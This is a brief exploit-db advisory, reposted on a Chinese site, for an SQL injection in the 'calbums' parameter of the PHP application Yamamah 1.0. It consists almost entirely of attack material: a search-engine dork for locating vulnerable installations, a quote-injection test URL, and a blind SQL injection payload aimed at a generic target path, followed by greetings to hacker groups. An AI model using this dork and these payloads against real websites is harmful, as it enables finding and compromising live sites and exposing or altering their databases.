Yamamah 1.0 – SQL Injection - 体验盒子

作者： TheMaStEr

日期： 2010-06-12

类别：

webapps

平台：

php

来源：https://www.exploit-db.com/exploits/13849/

# Exploit Title: Yamamah 1.0 SQL Injection Vulnerability
# Date: 12/06/2010
# Author: TheMaStEr <v4m@hotmail.de>
# Software Link: http://www.yamamah.org/
# Version: 1.00
# Tested on: Windows SP3
# Dork: intext:"Powered By : Yamamah Version 1.00"
# Code : http://localhost/y/index.php?calbums=1'
demo :
http://target/path/?calbums=1+and+1=1-- <Blind SQLi>
GreeTz : SA H4x0r (Abu Saud) , Dr-PHP , r3no , Hard_Hakerz , Ma3sTr0-Dz & All v4-Team Members

#